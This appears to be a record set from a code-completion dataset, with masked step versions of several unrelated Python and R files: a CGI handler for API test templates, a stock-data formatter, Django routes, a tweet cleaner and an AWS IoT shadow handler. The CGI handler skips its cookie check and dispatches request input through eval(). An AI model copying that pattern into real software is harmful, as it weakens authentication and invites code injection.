(int(page)-1) * limitnum list0 = Case_model().cmquery_page(pid=pid, skip_num=skipnum, limit_num=limitnum) self.out = {"data": list0} else: # 第一次查询,页码为0,查询总条数,用于前台分页 total = Case_model().cmquery_total(pid=pid) list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=limitnum) self.out = {"total": total, "data": list0} # 查询指定项目模版的id和名称,用于新增用例,所需参数opr,pid def cmquery_id_name(self): self.log.debug("cmquery_id_name in.") req = self.input["input"] # 指定的项目id pid = req["pid"] list0 = Case_model().cmquery_id_name(pid=pid) self.out = {"data": list0} # 通过模块名称模糊查询指定项目模版列表,所需参数opr,pid,name,page def cmquery_by_name(self): self.log.debug("cmquery_by_name in.") req = self.input["input"] # 指定项目id pid = req["pid"] # 模版名称 name = req["name"] # 当前页码数,第一次查询是默认为0 page = req["page"] # 每页显示条数 limitnum = 8 if page: # 数据库查询时跳过的条数 skipnum = (int(page) - 1) * limitnum list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=skipnum, limit_num=limitnum, name=name) self.out = {"data": list0} else: # 第一次查询,页码为0,查询总条数,用于前台分页 total = Case_model().cmquery_total_by_name(pid=pid, name=name) list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=0, limit_num=limitnum, name=name) self.out = {"total": total, "data": list0} # 通过id去查询用例模版,所需参数opr,id def cmquery_by_id(self): self.log.debug("cmquery_by_id in.") req = self.input["input"] # 模版id id = req["id"] case_model = Case_model().cmqueryone(id=id) if case_model: self.out = {"status": 0, "data": case_model} else: self.out = {"status": 1} # 编辑模版,所需参数opr, id, name, pid, ip, url, method, type def cmupdate(self): self.log.debug("cmupdate in.") req = self.input["input"] # 模版id id = req["id"] # 模版名 name = req["name"] # 项目名 pid = req["pid"] # API主机 ip = req["ip"] # 请求url url = req["url"] # 请求方法 method = req["method"] # 请求类型 type = req["type"] # 返回true(更新成功)/false(更新失败) istrue = Case_model().cmupdate(id=id, name=name, pid=pid, ip=ip, url=url, method=method, type=type) if istrue: # 重新查询 total = Case_model().cmquery_total(pid=pid) list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8) self.out = {"status": 0, "total": total, "data": list0} else: self.out = {"status":1} # 删除模版,所需参数opr,id,pid def cmdelete(self): self.log.debug("cmdelete in.") req = self.input["input"] # 模版id id = req["id"] # 项目id pid = req["pid"] # 批量删除 if isinstance(id, list): # 成功删除的个数 total = 0 # 循环删除 for i in id: num = Case_model().cmdelete(i) if num: total += 1 if total == len(id): # 重新查询 total = Case_model().cmquery_total(pid=pid) list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8) self.out = {"status": 0, "total": total, "data": list0} else: self.out = {"status": 1} # 删除单个 else: # 返回1(删除成功)/0(删除失败) num = Case_model().cmdelete(id) if num: # 重新查询 total = Case_model().cmquery_total(pid=pid) list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8) self.out = {"status": 0, "total": total, "data": list0} else: self.out = {"status": 1} if __name__ == "__main__": pass
normal
{ "blob_id": "5282e9a9e87fd7fd6053f816048f371fbe190046", "index": 5650, "step-1": "<mask token>\n\n\nclass Ccase_model(cgibase):\n\n def __init__(self):\n return cgibase.__init__(self)\n <mask token>\n\n def cmadd(self):\n self.log.debug('cmadd in.')\n req = self.input['input']\n name = req['name']\n pid = req['pid']\n ip = req['ip']\n url = req['url']\n method = req['method']\n type = req['type']\n num = Case_model().cmadd(name=name, pid=pid, ip=ip, url=url, method\n =method, type=type)\n if num:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n def cmquery(self):\n self.log.debug('cmquery in.')\n req = self.input['input']\n pid = req['pid']\n page = req['page']\n limitnum = 8\n if page:\n skipnum = (int(page) - 1) * limitnum\n list0 = Case_model().cmquery_page(pid=pid, skip_num=skipnum,\n limit_num=limitnum)\n self.out = {'data': list0}\n else:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=limitnum)\n self.out = {'total': total, 'data': list0}\n <mask token>\n <mask token>\n <mask token>\n\n def cmupdate(self):\n self.log.debug('cmupdate in.')\n req = self.input['input']\n id = req['id']\n name = req['name']\n pid = req['pid']\n ip = req['ip']\n url = req['url']\n method = req['method']\n type = req['type']\n istrue = Case_model().cmupdate(id=id, name=name, pid=pid, ip=ip,\n url=url, method=method, type=type)\n if istrue:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n def cmdelete(self):\n self.log.debug('cmdelete in.')\n req = self.input['input']\n id = req['id']\n pid = req['pid']\n if isinstance(id, list):\n total = 0\n for i in id:\n num = Case_model().cmdelete(i)\n if num:\n total += 1\n if total == len(id):\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n else:\n num = Case_model().cmdelete(id)\n if num:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Ccase_model(cgibase):\n\n def __init__(self):\n return cgibase.__init__(self)\n\n def onInit(self):\n cgibase.SetNoCheckCookie(self)\n opr = cgibase.onInit(self)\n if opr is None:\n return\n if not hasattr(self, opr):\n self.out = g_err['input_err']\n return\n eval('self.%s()' % opr)\n\n def cmadd(self):\n self.log.debug('cmadd in.')\n req = self.input['input']\n name = req['name']\n pid = req['pid']\n ip = req['ip']\n url = req['url']\n method = req['method']\n type = req['type']\n num = Case_model().cmadd(name=name, pid=pid, ip=ip, url=url, method\n =method, type=type)\n if num:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n def cmquery(self):\n self.log.debug('cmquery in.')\n req = self.input['input']\n pid = req['pid']\n page = req['page']\n limitnum = 8\n if page:\n skipnum = (int(page) - 1) * limitnum\n list0 = Case_model().cmquery_page(pid=pid, skip_num=skipnum,\n limit_num=limitnum)\n self.out = {'data': list0}\n else:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=limitnum)\n self.out = {'total': total, 'data': list0}\n\n def cmquery_id_name(self):\n self.log.debug('cmquery_id_name in.')\n req = self.input['input']\n pid = req['pid']\n list0 = Case_model().cmquery_id_name(pid=pid)\n self.out = {'data': list0}\n <mask token>\n\n def cmquery_by_id(self):\n self.log.debug('cmquery_by_id in.')\n req = self.input['input']\n id = req['id']\n case_model = Case_model().cmqueryone(id=id)\n if case_model:\n self.out = {'status': 0, 'data': case_model}\n else:\n self.out = {'status': 1}\n\n def cmupdate(self):\n self.log.debug('cmupdate in.')\n req = self.input['input']\n id = req['id']\n name = req['name']\n pid = req['pid']\n ip = req['ip']\n url = req['url']\n method = req['method']\n type = req['type']\n istrue = Case_model().cmupdate(id=id, name=name, pid=pid, ip=ip,\n url=url, method=method, type=type)\n if istrue:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n def cmdelete(self):\n self.log.debug('cmdelete in.')\n req = self.input['input']\n id = req['id']\n pid = req['pid']\n if isinstance(id, list):\n total = 0\n for i in id:\n num = Case_model().cmdelete(i)\n if num:\n total += 1\n if total == len(id):\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n else:\n num = Case_model().cmdelete(id)\n if num:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Ccase_model(cgibase):\n\n def __init__(self):\n return cgibase.__init__(self)\n\n def onInit(self):\n cgibase.SetNoCheckCookie(self)\n opr = cgibase.onInit(self)\n if opr is None:\n return\n if not hasattr(self, opr):\n self.out = g_err['input_err']\n return\n eval('self.%s()' % opr)\n\n def cmadd(self):\n self.log.debug('cmadd in.')\n req = self.input['input']\n name = req['name']\n pid = req['pid']\n ip = req['ip']\n url = req['url']\n method = req['method']\n type = req['type']\n num = Case_model().cmadd(name=name, pid=pid, ip=ip, url=url, method\n =method, type=type)\n if num:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n def cmquery(self):\n self.log.debug('cmquery in.')\n req = self.input['input']\n pid = req['pid']\n page = req['page']\n limitnum = 8\n if page:\n skipnum = (int(page) - 1) * limitnum\n list0 = Case_model().cmquery_page(pid=pid, skip_num=skipnum,\n limit_num=limitnum)\n self.out = {'data': list0}\n else:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=limitnum)\n self.out = {'total': total, 'data': list0}\n\n def cmquery_id_name(self):\n self.log.debug('cmquery_id_name in.')\n req = self.input['input']\n pid = req['pid']\n list0 = Case_model().cmquery_id_name(pid=pid)\n self.out = {'data': list0}\n\n def cmquery_by_name(self):\n self.log.debug('cmquery_by_name in.')\n req = self.input['input']\n pid = req['pid']\n name = req['name']\n page = req['page']\n limitnum = 8\n if page:\n skipnum = (int(page) - 1) * limitnum\n list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=\n skipnum, limit_num=limitnum, name=name)\n self.out = {'data': list0}\n else:\n total = Case_model().cmquery_total_by_name(pid=pid, name=name)\n list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=0,\n limit_num=limitnum, name=name)\n self.out = {'total': total, 'data': list0}\n\n def cmquery_by_id(self):\n self.log.debug('cmquery_by_id in.')\n req = self.input['input']\n id = req['id']\n case_model = Case_model().cmqueryone(id=id)\n if case_model:\n self.out = {'status': 0, 'data': case_model}\n else:\n self.out = {'status': 1}\n\n def cmupdate(self):\n self.log.debug('cmupdate in.')\n req = self.input['input']\n id = req['id']\n name = req['name']\n pid = req['pid']\n ip = req['ip']\n url = req['url']\n method = req['method']\n type = req['type']\n istrue = Case_model().cmupdate(id=id, name=name, pid=pid, ip=ip,\n url=url, method=method, type=type)\n if istrue:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n def cmdelete(self):\n self.log.debug('cmdelete in.')\n req = self.input['input']\n id = req['id']\n pid = req['pid']\n if isinstance(id, list):\n total = 0\n for i in id:\n num = Case_model().cmdelete(i)\n if num:\n total += 1\n if total == len(id):\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n else:\n num = Case_model().cmdelete(id)\n if num:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass Ccase_model(cgibase):\n\n def __init__(self):\n return cgibase.__init__(self)\n\n def onInit(self):\n cgibase.SetNoCheckCookie(self)\n opr = cgibase.onInit(self)\n if opr is None:\n return\n if not hasattr(self, opr):\n self.out = g_err['input_err']\n return\n eval('self.%s()' % opr)\n\n def cmadd(self):\n self.log.debug('cmadd in.')\n req = self.input['input']\n name = req['name']\n pid = req['pid']\n ip = req['ip']\n url = req['url']\n method = req['method']\n type = req['type']\n num = Case_model().cmadd(name=name, pid=pid, ip=ip, url=url, method\n =method, type=type)\n if num:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n def cmquery(self):\n self.log.debug('cmquery in.')\n req = self.input['input']\n pid = req['pid']\n page = req['page']\n limitnum = 8\n if page:\n skipnum = (int(page) - 1) * limitnum\n list0 = Case_model().cmquery_page(pid=pid, skip_num=skipnum,\n limit_num=limitnum)\n self.out = {'data': list0}\n else:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=limitnum)\n self.out = {'total': total, 'data': list0}\n\n def cmquery_id_name(self):\n self.log.debug('cmquery_id_name in.')\n req = self.input['input']\n pid = req['pid']\n list0 = Case_model().cmquery_id_name(pid=pid)\n self.out = {'data': list0}\n\n def cmquery_by_name(self):\n self.log.debug('cmquery_by_name in.')\n req = self.input['input']\n pid = req['pid']\n name = req['name']\n page = req['page']\n limitnum = 8\n if page:\n skipnum = (int(page) - 1) * limitnum\n list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=\n skipnum, limit_num=limitnum, name=name)\n self.out = {'data': list0}\n else:\n total = Case_model().cmquery_total_by_name(pid=pid, name=name)\n list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=0,\n limit_num=limitnum, name=name)\n self.out = {'total': total, 'data': list0}\n\n def cmquery_by_id(self):\n self.log.debug('cmquery_by_id in.')\n req = self.input['input']\n id = req['id']\n case_model = Case_model().cmqueryone(id=id)\n if case_model:\n self.out = {'status': 0, 'data': case_model}\n else:\n self.out = {'status': 1}\n\n def cmupdate(self):\n self.log.debug('cmupdate in.')\n req = self.input['input']\n id = req['id']\n name = req['name']\n pid = req['pid']\n ip = req['ip']\n url = req['url']\n method = req['method']\n type = req['type']\n istrue = Case_model().cmupdate(id=id, name=name, pid=pid, ip=ip,\n url=url, method=method, type=type)\n if istrue:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n def cmdelete(self):\n self.log.debug('cmdelete in.')\n req = self.input['input']\n id = req['id']\n pid = req['pid']\n if isinstance(id, list):\n total = 0\n for i in id:\n num = Case_model().cmdelete(i)\n if num:\n total += 1\n if total == len(id):\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n else:\n num = Case_model().cmdelete(id)\n if num:\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0,\n limit_num=8)\n self.out = {'status': 0, 'total': total, 'data': list0}\n else:\n self.out = {'status': 1}\n\n\nif __name__ == '__main__':\n pass\n", "step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom tp_global import *\nfrom cgibase import cgibase\nfrom tp_mongodb import *\nimport json\nimport requests\n\nclass Ccase_model(cgibase):\n def __init__(self):\n return cgibase.__init__(self)\n\n def onInit(self):\n cgibase.SetNoCheckCookie(self)\n opr = cgibase.onInit(self)\n if opr is None:\n return\n if not hasattr(self, opr):\n self.out = g_err[\"input_err\"]\n return\n eval(\"self.%s()\"%opr)\n\n # 新增模版,所需参数opr,name, pid, ip, url, method, type\n def cmadd(self):\n self.log.debug(\"cmadd in.\")\n req = self.input[\"input\"]\n # 模版名\n name = req[\"name\"]\n # 模版所属项目id\n pid = req[\"pid\"]\n # API主机\n ip = req[\"ip\"]\n # 请求url\n url = req[\"url\"]\n # 请求方法\n method = req[\"method\"]\n # 请求类型\n type = req[\"type\"]\n # 新增成功则返回模版ID,失败返回空\n num = Case_model().cmadd(name=name, pid=pid, ip=ip, url=url,\n method=method, type=type)\n if num:\n # 重新查询\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {\"status\": 0, \"total\": total, \"data\": list0}\n else:\n self.out = {\"status\":1}\n\n\n # 查询指定项目模版列表,所需参数opr,pid,page\n def cmquery(self):\n self.log.debug(\"cmquery in.\")\n req = self.input[\"input\"]\n # 指定项目id\n pid = req[\"pid\"]\n # 当前页码数,第一次查询是默认为0\n page = req[\"page\"]\n # 每页显示条数\n limitnum = 8\n if page:\n # 数据库查询时跳过的条数\n skipnum = (int(page)-1) * limitnum\n list0 = Case_model().cmquery_page(pid=pid, skip_num=skipnum, limit_num=limitnum)\n self.out = {\"data\": list0}\n else:\n # 第一次查询,页码为0,查询总条数,用于前台分页\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=limitnum)\n self.out = {\"total\": total, \"data\": list0}\n\n # 查询指定项目模版的id和名称,用于新增用例,所需参数opr,pid\n def cmquery_id_name(self):\n self.log.debug(\"cmquery_id_name in.\")\n req = self.input[\"input\"]\n # 指定的项目id\n pid = req[\"pid\"]\n list0 = Case_model().cmquery_id_name(pid=pid)\n self.out = {\"data\": list0}\n\n # 通过模块名称模糊查询指定项目模版列表,所需参数opr,pid,name,page\n def cmquery_by_name(self):\n self.log.debug(\"cmquery_by_name in.\")\n req = self.input[\"input\"]\n # 指定项目id\n pid = req[\"pid\"]\n # 模版名称\n name = req[\"name\"]\n # 当前页码数,第一次查询是默认为0\n page = req[\"page\"]\n # 每页显示条数\n limitnum = 8\n if page:\n # 数据库查询时跳过的条数\n skipnum = (int(page) - 1) * limitnum\n list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=skipnum, limit_num=limitnum, name=name)\n self.out = {\"data\": list0}\n else:\n # 第一次查询,页码为0,查询总条数,用于前台分页\n total = Case_model().cmquery_total_by_name(pid=pid, name=name)\n list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=0, limit_num=limitnum, name=name)\n self.out = {\"total\": total, \"data\": list0}\n\n # 通过id去查询用例模版,所需参数opr,id\n def cmquery_by_id(self):\n self.log.debug(\"cmquery_by_id in.\")\n req = self.input[\"input\"]\n # 模版id\n id = req[\"id\"]\n case_model = Case_model().cmqueryone(id=id)\n if case_model:\n self.out = {\"status\": 0, \"data\": case_model}\n else:\n self.out = {\"status\": 1}\n\n # 编辑模版,所需参数opr, id, name, pid, ip, url, method, type\n def cmupdate(self):\n self.log.debug(\"cmupdate in.\")\n req = self.input[\"input\"]\n # 模版id\n id = req[\"id\"]\n # 模版名\n name = req[\"name\"]\n # 项目名\n pid = req[\"pid\"]\n # API主机\n ip = req[\"ip\"]\n # 请求url\n url = req[\"url\"]\n # 请求方法\n method = req[\"method\"]\n # 请求类型\n type = req[\"type\"]\n # 返回true(更新成功)/false(更新失败)\n istrue = Case_model().cmupdate(id=id, name=name, pid=pid,\n ip=ip, url=url, method=method, type=type)\n if istrue:\n # 重新查询\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {\"status\": 0, \"total\": total, \"data\": list0}\n else:\n self.out = {\"status\":1}\n\n\n # 删除模版,所需参数opr,id,pid\n def cmdelete(self):\n self.log.debug(\"cmdelete in.\")\n req = self.input[\"input\"]\n # 模版id\n id = req[\"id\"]\n # 项目id\n pid = req[\"pid\"]\n # 批量删除\n if isinstance(id, list):\n # 成功删除的个数\n total = 0\n # 循环删除\n for i in id:\n num = Case_model().cmdelete(i)\n if num:\n total += 1\n if total == len(id):\n # 重新查询\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {\"status\": 0, \"total\": total, \"data\": list0}\n else:\n self.out = {\"status\": 1}\n # 删除单个\n else:\n # 返回1(删除成功)/0(删除失败)\n num = Case_model().cmdelete(id)\n if num:\n # 重新查询\n total = Case_model().cmquery_total(pid=pid)\n list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)\n self.out = {\"status\": 0, \"total\": total, \"data\": list0}\n else:\n self.out = {\"status\": 1}\n\nif __name__ == \"__main__\":\n\n pass", "step-ids": [ 6, 9, 10, 11, 13 ] }
[ 6, 9, 10, 11, 13 ]
import sys import datetime training = False if (sys.argv[1]=='0') else True def read_file(filename): with open(filename) as f: aux = [str(x) for x in f.readline().split()] array = [] for line in f: # read rest of lines s=line.split() array2=[s[0]] + [float(x) for x in s[1:]] array.append(array2) return array[::-1] def operar(datos): new_datos = [] for x in datos: n=[] d=datetime.datetime.strptime(x[0], "%d/%m/%y").date() n.append(d.day) n.append(d.month) n.append(d.weekday()) n.append(x[1]-x[2]) n.append(x[4]-x[2]) n.append(x[5]-x[2]) n.append(0 if (x[3]<0) else 1) new_datos.append(n) return new_datos def imprimir(fname, outname, datos, num): fp = open('datos/'+outname+str(num-1), 'w+') i=num-1 for x in datos[num-1:]: for a in datos[i-num+1:i]: for b in a[3:]: if(isinstance(b, float)): fp.write(str(round(b, 3))) else: fp.write(str(b)) fp.write(' ') for c in datos[i][:3]: if(isinstance(c, float)): fp.write(str(round(c, 3))) else: fp.write(str(c)) fp.write(' ') if(training): fp.write(str(datos[i][6])) fp.write('\n') i+=1 fp.close() fname = sys.argv[3] comb = int(sys.argv[2]) datos = read_file(fname) print len(datos), 'datos' datos=operar(datos) for i in list(range(2, comb+1)): imprimir(fname, sys.argv[4], datos, i)
normal
{ "blob_id": "dd4892c5a0b675d1c97fb91a5ca8115801a2bbca", "index": 9034, "step-1": "\nimport sys\nimport datetime\n\ntraining = False if (sys.argv[1]=='0') else True\n\ndef read_file(filename):\n\n with open(filename) as f:\n aux = [str(x) for x in f.readline().split()]\n array = []\n for line in f: # read rest of lines\n s=line.split()\n array2=[s[0]] + [float(x) for x in s[1:]]\n array.append(array2)\n \n return array[::-1] \n \n \ndef operar(datos):\n\n new_datos = []\n for x in datos:\n n=[]\n d=datetime.datetime.strptime(x[0], \"%d/%m/%y\").date()\n n.append(d.day)\n n.append(d.month) \n n.append(d.weekday())\n n.append(x[1]-x[2])\n n.append(x[4]-x[2])\n n.append(x[5]-x[2])\n n.append(0 if (x[3]<0) else 1) \n new_datos.append(n) \n return new_datos \n\ndef imprimir(fname, outname, datos, num):\n\n fp = open('datos/'+outname+str(num-1), 'w+')\n i=num-1\n for x in datos[num-1:]:\n for a in datos[i-num+1:i]:\n for b in a[3:]:\n if(isinstance(b, float)):\n fp.write(str(round(b, 3)))\n else: \n fp.write(str(b))\n fp.write(' ') \n for c in datos[i][:3]: \n if(isinstance(c, float)):\n fp.write(str(round(c, 3)))\n else: \n fp.write(str(c))\n fp.write(' ')\n if(training):\n fp.write(str(datos[i][6]))\n fp.write('\\n')\n i+=1\n fp.close() \n \n\nfname = sys.argv[3]\ncomb = int(sys.argv[2]) \ndatos = read_file(fname) \nprint len(datos), 'datos'\ndatos=operar(datos)\nfor i in list(range(2, comb+1)):\n imprimir(fname, sys.argv[4], datos, i)\n\n\n \n \n \n \n \n\n\n\n\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from . import views from django.urls import path, re_path app_name = "blogs" urlpatterns = [ path('', views.index, name='index'), re_path(r'^blogs/(?P<blog_id>\d+)/$', views.blog, name='blog'), path('new_blog/', views.new_blog, name='new_blog'), re_path(r'^edit_blog/(?P<blog_id>\d+)/$', views.edit_blog, name='edit_blog'), ]
normal
{ "blob_id": "d73491d6673abdabad85176c5f75a191995c806d", "index": 1260, "step-1": "<mask token>\n", "step-2": "<mask token>\napp_name = 'blogs'\nurlpatterns = [path('', views.index, name='index'), re_path(\n '^blogs/(?P<blog_id>\\\\d+)/$', views.blog, name='blog'), path(\n 'new_blog/', views.new_blog, name='new_blog'), re_path(\n '^edit_blog/(?P<blog_id>\\\\d+)/$', views.edit_blog, name='edit_blog')]\n", "step-3": "from . import views\nfrom django.urls import path, re_path\napp_name = 'blogs'\nurlpatterns = [path('', views.index, name='index'), re_path(\n '^blogs/(?P<blog_id>\\\\d+)/$', views.blog, name='blog'), path(\n 'new_blog/', views.new_blog, name='new_blog'), re_path(\n '^edit_blog/(?P<blog_id>\\\\d+)/$', views.edit_blog, name='edit_blog')]\n", "step-4": "from . import views\nfrom django.urls import path, re_path\n\napp_name = \"blogs\"\n\nurlpatterns = [\npath('', views.index, name='index'),\nre_path(r'^blogs/(?P<blog_id>\\d+)/$', views.blog, name='blog'),\npath('new_blog/', views.new_blog, name='new_blog'),\nre_path(r'^edit_blog/(?P<blog_id>\\d+)/$', views.edit_blog, name='edit_blog'),\n]\n\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
processed_lines = [] for line in open('9.in'): if line: processing_pattern = False new_line = '' for idx, char in enumerate(line): pattern_found = False if line[idx] == '(' and line[idx + 1].isnumeric() and line[idx + 2 ] == 'x' and line[idx + 3].isnumeric() and line[idx + 4 ] == ')': pattern_found = True num_chars = int(line[idx + 1]) repeat_times = int(line[idx + 3]) else: new_line += char processed_lines.append(new_line)
normal
{ "blob_id": "3605f46da25eb98767ca8d7248beaa07572d3171", "index": 644, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor line in open('9.in'):\n if line:\n processing_pattern = False\n new_line = ''\n for idx, char in enumerate(line):\n pattern_found = False\n if line[idx] == '(' and line[idx + 1].isnumeric() and line[idx + 2\n ] == 'x' and line[idx + 3].isnumeric() and line[idx + 4\n ] == ')':\n pattern_found = True\n num_chars = int(line[idx + 1])\n repeat_times = int(line[idx + 3])\n else:\n new_line += char\n processed_lines.append(new_line)\n", "step-3": "processed_lines = []\nfor line in open('9.in'):\n if line:\n processing_pattern = False\n new_line = ''\n for idx, char in enumerate(line):\n pattern_found = False\n if line[idx] == '(' and line[idx + 1].isnumeric() and line[idx + 2\n ] == 'x' and line[idx + 3].isnumeric() and line[idx + 4\n ] == ')':\n pattern_found = True\n num_chars = int(line[idx + 1])\n repeat_times = int(line[idx + 3])\n else:\n new_line += char\n processed_lines.append(new_line)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
short_train <- read.csv('short_train.csv', header=TRUE) #delete unnecessary columns short_train[1] <- NULL #remove ngrams containing @user_ regexp <- "@[a-zA-Z0-9_]*" gsubtry <- gsub(pattern = regexp, replacement = "", x = short_train$Tweet) #merge gsubtry back into short_train, rename as Tweet short_train_clean <- cbind(short_train, gsubtry) short_train_clean[2] <- NULL names(short_train_clean)[3] <- "Tweet"
normal
{ "blob_id": "48a970b35aa7fd677828f5d7bd5f1dcf24511b01", "index": 9098, "step-1": "short_train <- read.csv('short_train.csv', header=TRUE)\n\n#delete unnecessary columns\nshort_train[1] <- NULL\n\n#remove ngrams containing @user_\nregexp <- \"@[a-zA-Z0-9_]*\"\ngsubtry <- gsub(pattern = regexp, replacement = \"\", x = short_train$Tweet)\n\n#merge gsubtry back into short_train, rename as Tweet\nshort_train_clean <- cbind(short_train, gsubtry)\nshort_train_clean[2] <- NULL\nnames(short_train_clean)[3] <- \"Tweet\"", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#!/usr/bin/env python3 """Initiates connection to AWSIoT and provides helper functions deviceshadowhandler.py by Darren Dunford """ import json import logging import queue from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTShadowClient LOGGER = logging.getLogger(__name__) class DeviceShadowHandler: def status_post(self, status, state=None): """Post status message and device state to AWSIoT and LOGGER :param status: status string :param state: optional dictionary to add to shadow reported state :return: """ # create new JSON payload to update device shadow new_payload = {"state": {"reported": {"status": str(status)}, "desired": None}} if state: new_payload.update({"state": {"reported": state}}) # update shadow self.shadow_handler.shadowUpdate(json.dumps(new_payload), None, 20) # log to syslog LOGGER.info(status) LOGGER.debug(json.dumps(new_payload)) # constructor def __init__(self, thingname: str, host: str, root_ca_path: str, private_key_path: str, certificate_path: str): """Initiate AWS IoT connection :param thingname: AWSIoT thing name :param host: AWSIoT endpoint FQDN :param root_ca_path: local file path to Amazon root certificate :param private_key_path: local file path to device private key :param certificate_path: local file path to device certificate """ # Init Shadow Client MQTT connection self.shadow_client = AWSIoTMQTTShadowClient(thingname) self.shadow_client.configureEndpoint(host, 8883) self.shadow_client.configureCredentials(root_ca_path, private_key_path, certificate_path) # AWSIoTMQTTShadowClient configuration self.shadow_client.configureAutoReconnectBackoffTime(1, 32, 20) self.shadow_client.configureConnectDisconnectTimeout(20) # 20 sec self.shadow_client.configureMQTTOperationTimeout(20) # 20 sec # force shadow client to use offline publish queueing # overriding the default behaviour for shadow clients in the SDK mqtt_client = self.shadow_client.getMQTTConnection() mqtt_client.configureOfflinePublishQueueing(-1) # Connect to AWS IoT with a 300 second keepalive self.shadow_client.connect(300) # Create a deviceShadow with persistent subscription and register delta handler self.shadow_handler = self.shadow_client.createShadowHandlerWithName(thingname, True) self.shadow_handler.shadowRegisterDeltaCallback(self.custom_shadow_callback_delta) # initial status post self.status_post('STARTING') # dictionary to hold callback responses self._callbackresponses = {} # callbacks in this class post events on to this queue self.event_queue = queue.SimpleQueue() self.settings = {} # Custom shadow callback for delta 